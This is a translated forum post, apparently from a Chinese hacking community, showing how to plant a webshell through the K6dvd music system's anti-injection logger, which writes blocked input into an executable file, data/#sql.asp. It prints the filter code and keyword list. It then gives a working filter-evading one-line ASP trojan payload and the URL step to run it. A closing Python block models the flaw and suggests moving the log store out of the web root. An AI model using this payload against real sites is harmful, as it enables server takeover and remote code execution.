I haven't read code for a long time ~ I believe many predecessors already knew this bug before I posted it!! PS: although I never found it written up anywhere, that may just be because it's been too long since I paid attention to the net! Ah ~~
K6dvd is a good music publishing management system in China!
Today Yu asked me to put out some penetration articles for everyone to discuss this week!~ That's a tough ask, because I haven't done any penetration testing for a while, so there's nothing to write about! But I still randomly flipped through some sites to see if I could squeeze out a newbie (cainiao) penetration article...
Found a music publishing site! I won't give out the URL, it's no longer up for penetration ~ Oh!
If you submit a URL with parameters, the following result is returned:
Well, an anti-injection system! Most people who do penetration testing will have seen this one ~
Illegal operation! The system makes the following records:
Operation IP: xxx.xx
Operation Time: 19:33:47
Operation page: /yxplay.asp
Submission method: GET
Submit parameter: id
Data submission: 109446
Oh, it even records my IP ~~
I casually tried some common penetration ideas ~ Nothing satisfying, because the anti-injection system blocks them! So I just downloaded the source code of the music system this site runs to see if I could dig up a 0day ~ And that's how we got this article!!
Let's take a look at the anti-injection system. It lives in conn.asp and sql.asp; the relevant section is below:
Dim dbkillSql, killSqlconn, connkillSql
' the "database" that stores the injection log is an Access file named data/#sql.asp
dbkillSql = "data/#sql.asp"
On Error Resume Next
Set killSqlconn = Server.CreateObject("ADODB.Connection")
connkillSql = "Provider=Microsoft.Jet.OLEDB.4.0;Data Source=" & Server.MapPath(dbkillSql)
killSqlconn.Open connkillSql
That opens the connection to the log database!
'-------- POST part ------------------
If Request.Form <> "" Then
  For Each Fy_Post In Request.Form
    For Fy_Xh = 0 To Ubound(Fy_Inf)
      ' case-insensitive substring match of every filter keyword against the submitted value
      If Instr(LCase(Request.Form(Fy_Post)), Fy_Inf(Fy_Xh)) <> 0 Then
        If WriteSql = True Then
          ' the blocked submission is written, almost verbatim, into the log table inside data/#sql.asp
          killSqlconn.execute("insert into 9j455(Sqlin_IP,SqlIn_Web,SqlIn_FS,SqlIn_CS,SqlIn_SJ) values('" & Request.ServerVariables("REMOTE_ADDR") & "','" & Request.ServerVariables("URL") & "','POST','" & Fy_Post & "','" & replace(Request.Form(Fy_Post),"'","''") & "')")
          killSqlconn.close
          Set killSqlconn = Nothing
        End If
        Response.Write "<Script Language=JavaScript>alert('Happy audio/video entertainment network prompts you: please do not submit any illegal characters or parameters to this site to try to inject!');</Script>"
        Response.Write "Illegal operation! The system makes the following records:<br>"
        Response.Write "Operation IP: " & Request.ServerVariables("REMOTE_ADDR") & "<br>"
        Response.Write "Operation time: " & Now & "<br>"
        Response.Write "Operation page: " & Request.ServerVariables("URL") & "<br>"
        Response.Write "Submission method: POST<br>"
        Response.Write "Submit parameter: " & Fy_Post & "<br>"
        Response.Write "Data submission: " & Request.Form(Fy_Post)
        Response.End
      End If
    Next
  Next
End If
Well, that's where the alert error message comes from!
Take a closer look and you'll spot an interesting guy:
killSqlconn.execute("insert into 9j455(Sqlin_IP,SqlIn_Web,SqlIn_FS,SqlIn_CS,SqlIn_SJ) values('" & Request.ServerVariables("REMOTE_ADDR") & "','" & Request.ServerVariables("URL") & "','POST','" & Fy_Post & "','" & replace(Request.Form(Fy_Post),"'","''") & "')")
This is just the normal record of the IP and action type, plus the content submitted by the injector!! But look at the database opened with Server.CreateObject("ADODB.Connection") above: it turns out to be an .asp file, data/#sql.asp, reachable under the web root... So if we submit <% execute(request("wooden")) %>, won't that write a one-sentence trojan into #sql.asp? Don't get too happy. Let's look again:
' Customize the strings to be filtered, separated by "|"
Fy_In = "'|;|and|exec|insert|select|delete|update|count|*|%|chr|mid|master|truncate|char|declare"
Fy_Inf = split(Fy_In, "|")   ' the keyword array the POST loop above walks
Every submitted value is checked against the keywords in Fy_In! If any of these keywords appears in the submitted content, you can't get it into the database!
If you've studied regular expressions, or you're a JavaScript master, this is no problem. After changing it over and over again, a trojan that gets past all of the detection statements above is finally born ~ That's the beauty of eval: no more error from execute!
<script runat=server language=vbscript>eval request(chr(35))</script>
Exploitation method: and => <script runat=server language=vbscript>eval request(chr(35))</script>
Then access data/%23sql.asp to run the one-sentence trojan:
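As an added defender-side example (not code from the page or from K6dvd), the filter-and-log behaviour above modelled in Python: it classifies which submissions the Fy_In keyword check lets through, which it logs, and which logged ones carry ASP script markers, and it checks whether the log database's own file name is one the ASP engine would execute. Assumptions: the leading single quote in Fy_In (dropped by extraction), and the minimal executable-extension list.

```python
import re

# Keyword list from the page's Fy_In (the leading single quote is assumed; extraction
# dropped it), split on "|" exactly as the ASP code does.
FY_IN = "'|;|and|exec|insert|select|delete|update|count|*|%|chr|mid|master|truncate|char|declare"
FY_INF = FY_IN.split("|")

# Markers that turn stored text into server-side code once the file holding it is
# handed to the ASP engine: "<%" blocks and <script runat=server ...> blocks.
ASP_MARKERS = re.compile(r'<%|<script[^>]*\brunat\s*=\s*"?server', re.I)

# Extensions the classic ASP ISAPI mapping executes (assumed minimal list).
ASP_EXTENSIONS = {"asp", "asa"}


def is_blocked(value: str) -> bool:
    """Mirror the page's check: Instr(LCase(value), keyword) <> 0 for any keyword."""
    low = value.lower()
    return any(k in low for k in FY_INF)


def stored_form(value: str) -> str:
    """What the insert into 9j455 actually stores: replace(value, "'", "''")."""
    return value.replace("'", "''")


def classify(value: str) -> str:
    """passed: reaches the site untouched; logged: written into the log DB;
    logged-with-server-script: written into the log DB and carrying ASP markers."""
    if not is_blocked(value):
        return "passed"
    if ASP_MARKERS.search(stored_form(value)):
        return "logged-with-server-script"
    return "logged"


def log_db_is_executable(db_path: str) -> bool:
    """True when the log database's own name would be handled by the ASP engine."""
    name = db_path.rsplit("/", 1)[-1]
    return "." in name and name.rsplit(".", 1)[-1].lower() in ASP_EXTENSIONS


# Constructed sample submissions: the page's own values plus the benign id.
SAMPLES = {
    "benign id": "109446",
    "plain probe": "1 and 1=1",
    "page payload": "and <script runat=server language=vbscript>eval request(chr(35))</script>",
}

if __name__ == "__main__":
    for label, value in SAMPLES.items():
        print(f"{label:>13}: {classify(value)}")
    print("data/#sql.asp executable:", log_db_is_executable("data/#sql.asp"))
```

The fix this check points at is the one the page implies: keep the log store out of the web root (or at least not under an executable extension), so a logged request can never become a served script.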